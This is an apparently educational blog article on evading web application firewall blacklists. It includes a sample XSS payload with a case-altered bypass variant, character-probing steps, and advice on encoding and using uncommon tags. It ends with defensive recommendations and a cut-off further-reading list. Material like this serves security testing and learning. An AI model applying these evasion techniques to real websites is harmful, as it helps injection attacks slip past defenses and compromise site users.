Introduction
This article aims to educate the user about the various techniques used to bypass web application firewalls(WAF's),. This article will primarily focus on blacklists and bypassing blacklists
WHAT IS A WAF
As already mentioned WAF stands for web application firewall and is used by web applications to prevent unauthorised access, i.e, to keep hackers away from their sites
A WAF generally implements a blacklist or a whitelist to filter out malicious requests.
So What is a Blacklist?
A blacklist is a set of malicious commands/statements/strings that are blocked by the WAF, think of it as a "disallow list"
SO WHAT IS A WHITELIST?
Whitelists are lists of trusted sources or entities that are granted access to a system, network, or application, think of them as an "allow-only list"
The Issue with Blacklists
The issue with blacklists is that it only filters pre-existing common payloads and because WAF's use regex to filter payloads, which is not very efficient, for example, it might filter <image/src/onerror=prompt(8)> but allow <imAge/srC/oNError=pRompt(8)>
Blacklisting is also really tricky because a non-malicious request might get flagged and filtered which might be bad both for the user and the owner of the web app.
Not all attacks can be prevented by WAF
certain vulnerabilities which do not require payloads like idor's or business logic attacks aren't prevented by WAFs and in certain cases might be chained to escalate the impact of the bug.
TECHNIQUES USED TO BYPASS A BLACKLIST
Figure out what is being filtered by the blacklist by inserting payloads and altering them in input fields, try entering special characters
'
,"
,`
,\
,<
,>,$
,#
,%
,{
,}
once you've figured out what is being filtered, use a payload which contains those characters and commands and try encoding it(base64, url, html, etc.) and see if that works
Use payloads which aren't commonly used like <iframes>
Alter the payload by changing certain characters to uppercase, adding white spaces in between, etc.
Conclusion
In conclusion, web application firewalls (WAFs) play a critical role in protecting web applications from cyber attacks. WAFs use rules and filters to block malicious traffic and allow legitimate traffic to pass through, and they may also use blacklists to block known malicious traffic. However, attackers may try to bypass WAFs using various techniques, such as encoding, use of legitimate traffic, evasion techniques, and exploitation of vulnerabilities.
To protect against these techniques, organizations need to keep their WAFs and web applications up to date with the latest security patches and updates. They should also monitor traffic passing through the WAF and look for signs of malicious activity. By implementing multiple layers of defence and staying vigilant, organizations can better protect their web applications from cyber attacks and ensure the security of their data and systems.
FURTHER READING:
yeswehack's article on WAF bypass https://blog.yeswehack.com/yeswerhackers/web-application-firewall-bypass/
Somdev Sangwan's article on ModSecurity bypass: